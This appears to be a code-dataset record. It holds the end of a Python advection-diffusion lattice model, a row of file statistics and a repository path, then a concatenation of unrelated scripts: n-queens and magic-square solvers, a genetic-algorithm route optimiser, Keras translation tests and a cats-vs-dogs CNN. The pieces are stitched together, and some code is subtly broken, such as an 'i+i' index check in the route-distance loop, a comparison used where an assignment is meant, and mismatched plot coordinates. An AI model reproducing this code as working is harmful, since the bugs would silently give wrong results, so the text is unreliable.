nave = self.nx/nblocks
Ab = np.empty(nblocks)
for i in range(nblocks):
Ab[i] = A[i*nave:(i+1)*nave].mean()
return Ab
class LatticeModelGy():
""" A class that represents a two-dimensional lattice
model of advection-diffusion with large-scale
sinusoidal source """
def __init__(self,
nx=128,
ny=None,
Lx=2*pi,
Ly=None,
dt=0.5,
tmax=1000,
tavestart = 500,
kappa=1.e-5,
urms = 1.,
power = 3.5,
nmin = 5.,
nmax = None,
G = 1.,
diagnostics_list='all',
cadence = 5):
if ny is None: ny = nx
if Ly is None: Ly = Lx
self.nx = nx
self.ny = ny
self.Lx = Lx
self.Ly = Ly
self.dt = dt
self.dt_2 = dt/2.
self.dt_4 = dt/4.
self.tmax = tmax
self.tavestart = tavestart
self.t = 0.
self.tc = 0
self.G = G
self.kappa = kappa
self.nmin = nmin
if nmax:
self.nmax = nmax
else:
self.nmax = nx
self.power = power
self.urms = urms
self.diagnostics_list = diagnostics_list
self.cadence = cadence
self._initialize_grid()
self._init_velocity()
self._initialize_diagnostics()
self.even = True
self.odd = False
def _initialize_grid(self):
""" Initialize lattice and spectral space grid """
# physical space grids
self.dx, self.dy = self.Lx/(self.nx), self.Ly/(self.ny)
self.x = np.linspace(0.,self.Lx-self.dx,self.nx)
self.y = np.linspace(0.,self.Ly-self.dy,self.ny)
self.xi, self.yi = np.meshgrid(self.x,self.y)
self.ix, self.iy = np.meshgrid(range(self.nx),
range(self.ny))
# wavenumber grids
self.dk = 2.*pi/self.Lx
self.dl = 2.*pi/self.Ly
self.nl = self.ny
self.nk = self.nx/2+1
self.ll = self.dl*np.append( np.arange(0.,self.nx/2),
np.arange(-self.nx/2,0.) )
self.kk = self.dk*np.arange(0.,self.nk)
self.k, self.l = np.meshgrid(self.kk, self.ll)
self.ik = 1j*self.k
self.il = 1j*self.l
# constant for spectral normalizations
self.M = self.nx*self.ny
self.M2 = self.M**2
self.wv2 = self.k**2 + self.l**2
self.wv = np.sqrt( self.wv2 )
def _velocity(self):
phase = 2*pi*np.random.rand(2,self.nmax-self.nmin)
phi, psi = phase[0], phase[1]
Yn = self.n*self.y[...,np.newaxis] + phase[0][np.newaxis,...]
Xn = self.n*self.x[...,np.newaxis] + phase[1][np.newaxis,...]
u = (self.An*cos(Yn*self.dl)).sum(axis=1)
v = (self.An*cos(Xn*self.dk)).sum(axis=1)
self.u = u[...,np.newaxis]
self.v = v[np.newaxis,...]
def _init_velocity(self):
self.n = np.arange(self.nmin,self.nmax)[np.newaxis,...]
An = (self.n/self.nmin)**(-self.power/2.)
N = 2*self.urms/( np.sqrt( ((self.n/self.nmin)**-self.power).sum() ) )
self.An = N*An
#self.An = np.sqrt(2.)
#self.An = 2*urms
# estimate the Batchelor scale
S = np.sqrt( ((self.An*self.n*self.dk)**2).sum()/2. )
self.lb = np.sqrt(self.kappa/S)
#assert self.lb > self.dx, "**Warning: Batchelor scale not resolved."
def _advect(self,direction='x',n=1):
""" Advect th on a lattice given u and v,
and the current index array ix, iy
n is the number of substeps
n=1 for doing the full advection-diffusion,
n=2 for doing half the advection, etc """
if direction == 'x':
ix_new = self.ix.copy()
dindx = -np.round(self.u*self.dt_2/n/self.dx).astype(int)
ix_new = self.ix + dindx
ix_new[ix_new<0] = ix_new[ix_new<0] + self.nx
ix_new[ix_new>self.nx-1] = ix_new[ix_new>self.nx-1] - self.nx
self.th = self.th[self.iy,ix_new]
elif direction == 'y':
iy_new = self.iy.copy()
dindy = -np.round(self.v*self.dt_2/n/self.dy).astype(int)
iy_new = self.iy + dindy
iy_new[iy_new<0] = iy_new[iy_new<0] + self.ny
iy_new[iy_new>self.ny-1] = iy_new[iy_new>self.ny-1] - self.ny
self.th = self.th[iy_new,self.ix] + self.G*self.v*self.dt_2/n
def _diffuse(self, n=1):
""" Diffusion """
self.thh = np.fft.rfft2(self.th)
self.thh = self.thh*exp(-(self.dt/n)*self.kappa*self.wv2)
self.th = np.fft.irfft2(self.thh)
def _step_forward(self):
self._velocity()
# x-dir
self._advect(direction='x',n=2)
self._calc_diagnostics()
self._diffuse(n=4)
#self._calc_diagnostics()
self._advect(direction='x',n=2)
self._calc_diagnostics()
self._diffuse(n=4)
#self._calc_diagnostics()
# y-dir
self._advect(direction='y',n=2)
self._calc_diagnostics()
self._diffuse(n=4)
#self._calc_diagnostics()
self._advect(direction='y',n=2)
self._calc_diagnostics()
self._diffuse(n=4)
#self._calc_diagnostics()
self.tc += 1
self.t += self.dt
def run_with_snapshots(self, tsnapstart=0., tsnap=1):
"""Run the model forward, yielding to user code at specified intervals.
"""
tsnapint = np.ceil(tsnap/self.dt)
while(self.t < self.tmax):
self._step_forward()
if self.t>=tsnapstart and (self.tc%tsnapint)==0:
yield self.t
return
def run(self):
"""Run the model forward without stopping until the end."""
while(self.t < self.tmax):
self._step_forward()
def _calc_diagnostics(self):
# here is where we calculate diagnostics
if (self.t>=self.dt) and (self.t>=self.tavestart) and (self.tc%self.cadence):
self._increment_diagnostics()
# diagnostic stuff follow
def _initialize_diagnostics(self):
# Initialization for diagnotics
self.diagnostics = dict()
self._setup_diagnostics()
if self.diagnostics_list == 'all':
pass # by default, all diagnostics are active
elif self.diagnostics_list == 'none':
self.set_active_diagnostics([])
else:
self.set_active_diagnostics(self.diagnostics_list)
def _setup_diagnostics(self):
"""Diagnostics setup"""
self.add_diagnostic('var',
description='Tracer variance',
function= (lambda self: self.spec_var(self.thh))
)
self.add_diagnostic('thbar',
description='x-averaged tracer',
function= (lambda self: self.thm)
)
self.add_diagnostic('grad2_th_bar',
description='x-averaged gradient square of th',
function= (lambda self: self.gradth2m)
)
self.add_diagnostic('vth2m',
description='x-averaged triple advective term v th2',
function= (lambda self: self.vth2m)
)
self.add_diagnostic('th2m',
description='x-averaged th2',
function= (lambda self: self.th2m)
)
self.add_diagnostic('vthm',
description='x-averaged, y-direction tracer flux',
function= (lambda self: (self.v*self.tha).mean(axis=1))
)
self.add_diagnostic('fluxy',
description='x-averaged, y-direction tracer flux',
function= (lambda self: (self.v*self.th).mean(axis=1))
)
self.add_diagnostic('spec',
description='spec of anomalies about x-averaged flow',
function= (lambda self: np.abs(np.fft.rfft2(
self.th-self.th.mean(axis=1)[...,np.newaxis]))**2/self.M2)
)
def _set_active_diagnostics(self, diagnostics_list):
for d in self.diagnostics:
self.diagnostics[d]['active'] == (d in diagnostics_list)
def add_diagnostic(self, diag_name, description=None, units=None, function=None):
# create a new diagnostic dict and add it to the object array
# make sure the function is callable
assert hasattr(function, '__call__')
# make sure the name is valid
assert isinstance(diag_name, str)
# by default, diagnostic is active
self.diagnostics[diag_name] = {
'description': description,
'units': units,
'active': True,
'count': 0,
'function': function, }
def describe_diagnostics(self):
"""Print a human-readable summary of the available diagnostics."""
diag_names = self.diagnostics.keys()
diag_names.sort()
print('NAME | DESCRIPTION')
print(80*'-')
for k in diag_names:
d = self.diagnostics[k]
print('{:<10} | {:<54}').format(
*(k, d['description']))
def _increment_diagnostics(self):
# compute intermediate quantities needed for some diagnostics
self._calc_derived_fields()
for dname in self.diagnostics:
if self.diagnostics[dname]['active']:
res = self.diagnostics[dname]['function'](self)
if self.diagnostics[dname]['count']==0:
self.diagnostics[dname]['value'] = res
else:
self.diagnostics[dname]['value'] += res
self.diagnostics[dname]['count'] += 1
def _calc_derived_fields(self):
""" Calculate derived field necessary for diagnostics """
self.thh = np.fft.rfft2(self.th)
# x-averaged tracer field
self.thm = self.th.mean(axis=1)
#self.thmh = np.fft.rfft(self.thm)
#self.thm_y = np.fft.irfft(1j*self.kk*self.thmh)
# anomaly about the x-averaged field
self.tha = self.th-self.thm[...,np.newaxis]
self.thah = np.fft.rfft2(self.tha)
# x-averaged gradient squared
gradx = np.fft.irfft2(1j*self.k*self.thah)
grady = np.fft.irfft2(1j*self.l*self.thah)
self.gradth2m = (gradx**2 + grady**2).mean(axis=1)
# Osborn-Cox amplification factor
#self.thm_y = 4*np.sin(self.y*self.dl)
#thm_y = self.block_average(self.thm_y)
#gradth2m = self.block_average(self.gradth2m)
#self.A2_OC = gradth2m / thm_y**2
#self.A2_OC[thm_y < 1.e-14] = np.nan
# triple term
self.vth2m = (self.v*(self.tha**2)).mean(axis=1)
# diff transport
self.th2m = (self.tha**2).mean(axis=1)
def get_diagnostic(self, dname):
return (self.diagnostics[dname]['value'] /
self.diagnostics[dname]['count'])
def spec_var(self, ph):
""" compute variance of p from Fourier coefficients ph """
var_dens = 2. * np.abs(ph)**2 / self.M**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[...,0] = var_dens[...,0]/2.
var_dens[...,-1] = var_dens[...,-1]/2.
return var_dens.sum()
def block_average(self,A, nblocks = 256):
""" Block average A onto A blocks """
nave = self.nx/nblocks
Ab = np.empty(nblocks)
for i in range(nblocks):
Ab[i] = A[i*nave:(i+1)*nave].mean()
return Ab
#grad2 = (wv2*(np.abs(thh)**2)).sum()/(N**2)
# a test initial concentration
#x0,y0 = pi,pi
#r = np.sqrt((x-x0)[np.newaxis,...]**2+(y-y0)[...,np.newaxis]**2)
#th = np.zeros(N,N)
#th = np.exp(-(r**2))
| 31.189295
| 85
| 0.544054
| 3,203
| 23,891
| 3.963472
| 0.103341
| 0.049626
| 0.021426
| 0.024262
| 0.959039
| 0.954234
| 0.94486
| 0.94486
| 0.94486
| 0.941788
| 0
| 0.020282
| 0.314847
| 23,891
| 765
| 86
| 31.230065
| 0.755269
| 0.179105
| 0
| 0.924731
| 0
| 0
| 0.045709
| 0
| 0
| 0
| 0
| 0
| 0.008602
| 1
| 0.088172
| false
| 0.006452
| 0.006452
| 0.004301
| 0.116129
| 0.012903
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a022a6319b9423c35a6989ab9a751215b2aaf76
| 854,077
|
py
|
Python
|
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
from constraint import Problem, Domain, AllDifferentConstraint
import matplotlib.pyplot as plt
import numpy as np
def _get_pairs(variables):
work = list(variables)
pairs = [ (work[i], work[i+1]) for i in range(len(work)-1) ]
return pairs
def n_queens(n=8):
def not_in_diagonal(a, b):
result = True
for i in range(1, n):
result = result and ( a != b + i )
return result
problem = Problem()
variables = { f'x{i}' for i in range(n) }
problem.addVariables(variables, Domain(set(range(1, n+1))))
problem.addConstraint(AllDifferentConstraint())
for pair in _get_pairs(variables):
problem.addConstraint(not_in_diagonal, pair)
return problem.getSolutions()
def magic_square(n=3):
def all_equal(*variables):
square = np.reshape(variables, (n, n))
diagonal = sum(np.diagonal(square))
b = True
for i in range(n):
b = b and sum(square[i, :]) == diagonal
b = b and sum(square[:, i]) == diagonal
if b:
print(square)
return b
problem = Problem()
variables = { f'x{i}{j}' for i in range(1, n+1) for j in range(1, n+1) }
problem.addVariables(variables, Domain(set(range(1, (n**2 + 2)))))
problem.addConstraint(all_equal, variables)
problem.addConstraint(AllDifferentConstraint())
return problem.getSolutions()
def plot_queens(solutions):
for solution in solutions:
for row, column in solution.items():
x = int(row.lstrip('x'))
y = column
plt.scatter(x, y, s=70)
plt.grid()
plt.show()
if __name__ == "__main__":
# solutions = n_queens(n=12)
# print(solutions)
# plot_queens(solutions)
solutions = magic_square(n=4)
for solution in solutions:
print(solution)
import numpy as np
import random
import operator
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from matplotlib import animation
from realtime_plot import realtime_plot
from threading import Thread, Event
from time import sleep
seaborn.set_style("dark")
stop_animation = Event()
# def animate_cities_and_routes():
# global route
# def wrapped():
# # create figure
# sleep(3)
# print("thread:", route)
# figure = plt.figure(figsize=(14, 8))
# ax1 = figure.add_subplot(1, 1, 1)
# def animate(i):
# ax1.title.set_text("Real time routes")
# for city in route:
# ax1.scatter(city.x, city.y, s=70, c='b')
# ax1.plot([ city.x for city in route ], [city.y for city in route], c='r')
# animation.FuncAnimation(figure, animate, interval=100)
# plt.show()
# t = Thread(target=wrapped)
# t.start()
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for city in route:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].x, route[-1].y])
plt.show()
def animate_progress():
global route
global progress
global stop_animation
def animate():
# figure = plt.figure()
# ax1 = figure.add_subplot(1, 1, 1)
figure, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for city in route:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in route ], [city.y for city in route], c='r')
ax1[0].plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
Thread(target=animate).start()
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
class Fitness:
def __init__(self, route):
self.route = route
def distance(self):
distance = 0
for i in range(len(self.route)):
from_city = self.route[i]
to_city = self.route[i+1] if i+i < len(self.route) else self.route[0]
distance += (from_city - to_city)
return distance
def fitness(self):
return 1 / self.distance()
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
# return [ City(x=random.randint(0, 200), y=random.randint(0, 200)) for i in range(size) ]
def create_route(cities):
return random.sample(cities, len(cities))
def initial_population(popsize, cities):
return [ create_route(cities) for i in range(popsize) ]
def sort_routes(population):
"""This function calculates the fitness of each route in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, Fitness(route).fitness()) for i, route in enumerate(population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(population, elite_size):
sorted_pop = sort_routes(population)
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
# calculates the cumulative sum
# example:
# [5, 6, 7] => [5, 11, 18]
df['cum_sum'] = df['Fitness'].cumsum()
# calculates the cumulative percentage
# example:
# [5, 6, 7] => [5/18, 11/18, 18/18]
# [5, 6, 7] => [27.77%, 61.11%, 100%]
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(elite_size) ]
for i in range(len(sorted_pop) - elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ population[index] for index in result ]
def breed(parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(selection, elite_size):
pool = random.sample(selection, len(selection))
# for i in range(elite_size):
# children.append(selection[i])
children = [selection[i] for i in range(elite_size)]
children.extend([breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - elite_size)])
# for i in range(len(selection) - elite_size):
# child = breed(pool[i], pool[len(selection)-i-1])
# children.append(child)
return children
def mutate(route, mutation_rate):
route_length = len(route)
for swapped in range(route_length):
if(random.random() < mutation_rate):
swap_with = random.randint(0, route_length-1)
route[swapped], route[swap_with] = route[swap_with], route[swapped]
return route
def mutate_population(population, mutation_rate):
return [ mutate(route, mutation_rate) for route in population ]
def next_gen(current_gen, elite_size, mutation_rate):
select = selection(population=current_gen, elite_size=elite_size)
children = breed_population(selection=select, elite_size=elite_size)
return mutate_population(children, mutation_rate)
def genetic_algorithm(cities, popsize, elite_size, mutation_rate, generations, plot=True, prn=True):
global route
global progress
population = initial_population(popsize=popsize, cities=cities)
if plot:
animate_progress()
sorted_pop = sort_routes(population)
initial_route = population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
if prn:
print(f"Initial distance: {distance}")
try:
if plot:
progress = [ distance ]
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
sorted_pop = sort_routes(population)
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
else:
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
distance = 1 / sort_routes(population)[0][1]
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
stop_animation.set()
final_route_index = sort_routes(population)[0][0]
final_route = population[final_route_index]
if prn:
print("Final route:", final_route)
return initial_route, final_route, distance
if __name__ == "__main__":
cities = generate_cities(25)
initial_route, final_route, distance = genetic_algorithm(cities=cities, popsize=120, elite_size=19, mutation_rate=0.0019, generations=1800)
# plot_routes(initial_route, final_route)
import numpy
import matplotlib.pyplot as plt
import cv2
from PIL import Image
from multiprocessing import Process
def fig2img ( fig ):
"""
brief Convert a Matplotlib figure to a PIL Image in RGBA format and return it
param fig a matplotlib figure
return a Python Imaging Library ( PIL ) image
"""
# put the figure pixmap into a numpy array
buf = fig2data ( fig )
w, h, d = buf.shape
return Image.frombytes( "RGB", ( w ,h ), buf.tostring( ) )
def fig2data ( fig ):
"""
brief Convert a Matplotlib figure to a 4D numpy array with RGBA channels and return it
param fig a matplotlib figure
return a numpy 3D array of RGBA values
"""
# draw the renderer
fig.canvas.draw ( )
# Get the RGBA buffer from the figure
w,h = fig.canvas.get_width_height()
buf = numpy.fromstring ( fig.canvas.tostring_rgb(), dtype=numpy.uint8 )
buf.shape = ( w, h,3 )
# canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode
buf = numpy.roll ( buf, 3, axis = 2 )
return buf
if __name__ == "__main__":
pass
# figure = plt.figure()
# plt.plot([3, 5, 9], [3, 19, 23])
# img = fig2img(figure)
# img.show()
# while True:
# frame = numpy.array(img)
# # Convert RGB to BGR
# frame = frame[:, :, ::-1].copy()
# print(frame)
# cv2.imshow("test", frame)
# if cv2.waitKey(0) == ord('q'):
# break
# cv2.destroyAllWindows()
def realtime_plot(route):
figure = plt.figure(figsize=(14, 8))
plt.title("Real time routes")
for city in route:
plt.scatter(city.x, city.y, s=70, c='b')
plt.plot([ city.x for city in route ], [city.y for city in route], c='r')
img = numpy.array(fig2img(figure))
cv2.imshow("test", img)
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
plt.close(figure)
from genetic import genetic_algorithm, generate_cities, City
import operator
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def train():
cities = load_cities()
generations = 1000
popsizes = [60, 100, 140, 180]
elitesizes = [5, 15, 25, 35, 45]
mutation_rates = [0.0001, 0.0005, 0.001, 0.005, 0.01]
total_iterations = len(popsizes) * len(elitesizes) * len(mutation_rates)
iteration = 0
tries = {}
for popsize in popsizes:
for elite_size in elitesizes:
for mutation_rate in mutation_rates:
iteration += 1
init_route, final_route, distance = genetic_algorithm( cities=cities,
popsize=popsize,
elite_size=elite_size,
mutation_rate=mutation_rate,
generations=generations,
plot=False,
prn=False)
progress = iteration / total_iterations
percentage = progress * 100
print(f"[{percentage:5.2f}%] [Iteration:{iteration:3}/{total_iterations:3}] [popsize={popsize:3} elite_size={elite_size:2} mutation_rate={mutation_rate:7}] Distance: {distance:4}")
tries[(popsize, elite_size, mutation_rate)] = distance
min_gen = min(tries.values())
reversed_tries = { v:k for k, v in tries.items() }
best_combination = reversed_tries[min_gen]
print("Best combination:", best_combination)
if __name__ == "__main__":
train()
# best parameters
# popsize elitesize mutation_rateqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
# 90 25 0.0001
# 110 10 0.001
# 130 10 0.005
# 130 20 0.001
# 150 25 0.001
import os
def load_data(path):
"""
Load dataset
"""
input_file = os.path.join(path)
with open(input_file, "r") as f:
data = f.read()
return data.split('\n')
import numpy as np
from keras.losses import sparse_categorical_crossentropy
from keras.models import Sequential
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
def _test_model(model, input_shape, output_sequence_length, french_vocab_size):
if isinstance(model, Sequential):
model = model.model
assert model.input_shape == (None, *input_shape[1:]),\
'Wrong input shape. Found input shape {} using parameter input_shape={}'.format(model.input_shape, input_shape)
assert model.output_shape == (None, output_sequence_length, french_vocab_size),\
'Wrong output shape. Found output shape {} using parameters output_sequence_length={} and french_vocab_size={}'\
.format(model.output_shape, output_sequence_length, french_vocab_size)
assert len(model.loss_functions) > 0,\
'No loss function set. Apply the compile function to the model.'
assert sparse_categorical_crossentropy in model.loss_functions,\
'Not using sparse_categorical_crossentropy function for loss.'
def test_tokenize(tokenize):
sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
tokenized_sentences, tokenizer = tokenize(sentences)
assert tokenized_sentences == tokenizer.texts_to_sequences(sentences),\
'Tokenizer returned and doesn\'t generate the same sentences as the tokenized sentences returned. '
def test_pad(pad):
tokens = [
[i for i in range(4)],
[i for i in range(6)],
[i for i in range(3)]]
padded_tokens = pad(tokens)
padding_id = padded_tokens[0][-1]
true_padded_tokens = np.array([
[i for i in range(4)] + [padding_id]*2,
[i for i in range(6)],
[i for i in range(3)] + [padding_id]*3])
assert isinstance(padded_tokens, np.ndarray),\
'Pad returned the wrong type. Found {} type, expected numpy array type.'
assert np.all(padded_tokens == true_padded_tokens), 'Pad returned the wrong results.'
padded_tokens_using_length = pad(tokens, 9)
assert np.all(padded_tokens_using_length == np.concatenate((true_padded_tokens, np.full((3, 3), padding_id)), axis=1)),\
'Using length argument return incorrect results'
def test_simple_model(simple_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = simple_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_embed_model(embed_model):
input_shape = (137861, 21)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = embed_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_encdec_model(encdec_model):
input_shape = (137861, 15, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_bd_model(bd_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = bd_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_model_final(model_final):
input_shape = (137861, 15)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = model_final(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
CATEGORIES = ["Dog", "Cat"]
IMG_SIZE = 100
DATADIR = r"C:\Users\STRIX\Desktop\CatnDog\PetImages"
TRAINING_DIR = r"E:\datasets\CatnDog\Training"
TESTING_DIR = r"E:\datasets\CatnDog\Testing"
import cv2
import tensorflow as tf
import os
import numpy as np
import random
from settings import *
from tqdm import tqdm
# CAT_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Cat"
# DOG_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Dog"
MODEL = "Cats-vs-dogs-new-6-0.90-CNN"
def prepare_image(path):
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
return image
# img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
# return img.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
def load_model():
return tf.keras.models.load_model(f"{MODEL}.model")
def predict(img):
prediction = model.predict([prepare_image(img)])[0][0]
return int(prediction)
if __name__ == "__main__":
model = load_model()
x_test, y_test = [], []
for code, category in enumerate(CATEGORIES):
path = os.path.join(TESTING_DIR, category)
for img in tqdm(os.listdir(path), "Loading images:"):
# result = predict(os.path.join(path, img))
# if result == code:
# correct += 1
# total += 1
# testing_data.append((os.path.join(path, img), code))
x_test.append(prepare_image(os.path.join(path, img)))
y_test.append(code)
x_test = np.array(x_test).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# random.shuffle(testing_data)
# total = 0
# correct = 0
# for img, code in testing_data:
# result = predict(img)
# if result == code:
# correct += 1
# total += 1
# accuracy = (correct/total) * 100
# print(f"{correct}/{total} Total Accuracy: {accuracy:.2f}%")
# print(x_test)
# print("="*50)
# print(y_test)
print(model.evaluate([x_test], y_test))
print(model.metrics_names)
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
# import cv2
from tqdm import tqdm
import random
from settings import *
# for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TRAINING_DIR, category)
# os.makedirs(directory)
# # for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TESTING_DIR, category)
# os.makedirs(directory)
# Total images for each category: 12501 image (total 25002)
# def create_data():
# for code, category in enumerate(CATEGORIES):
# path = os.path.join(DATADIR, category)
# for counter, img in enumerate(tqdm(os.listdir(path)), start=1):
# try:
# # absolute path of image
# image = os.path.join(path, img)
# image = cv2.imread(image, cv2.IMREAD_GRAYSCALE)
# image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
# if counter < 300:
# # testing image
# img = os.path.join(TESTING_DIR, category, img)
# else:
# # training image
# img = os.path.join(TRAINING_DIR, category, img)
# cv2.imwrite(img, image)
# except:
# pass
def load_data(path):
data = []
for code, category in enumerate(CATEGORIES):
p = os.path.join(path, category)
for img in tqdm(os.listdir(p), desc=f"Loading {category} data: "):
img = os.path.join(p, img)
img = cv2.imread(img, cv2.IMREAD_GRAYSCALE)
data.append((img, code))
return data
def load_training_data():
return load_data(TRAINING_DIR)
def load_testing_data():
return load_data(TESTING_DIR)
# # load data
# training_data = load_training_data()
# # # shuffle data
# random.shuffle(training_data)
# X, y = [], []
# for features, label in tqdm(training_data, desc="Splitting the data: "):
# X.append(features)
# y.append(label)
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# # pickling (images,labels)
# print("Pickling data...")
import pickle
# with open("X.pickle", 'wb') as pickle_out:
# pickle.dump(X, pickle_out)
# with open("y.pickle", 'wb') as pickle_out:
# pickle.dump(y, pickle_out)
def load():
return np.array(pickle.load(open("X.pickle", 'rb'))), pickle.load(open("y.pickle", 'rb'))
print("Loading data...")
X, y = load()
X = X/255 # to make colors from 0 to 1
print("Shape of X:", X.shape)
import tensorflow
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
# from tensorflow.keras.callbacks import TensorBoard
print("Imported tensorflow, building model...")
NAME = "Cats-vs-dogs-new-9-{val_acc:.2f}-CNN"
checkpoint = ModelCheckpoint(filepath=f"{NAME}.model", save_best_only=True, verbose=1)
# 3 conv, 64 nodes per layer, 0 dense
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (2, 2)))
model.add(Dropout(0.1))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(64, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(96, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(96, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(128, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dense(500, activation="relu"))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
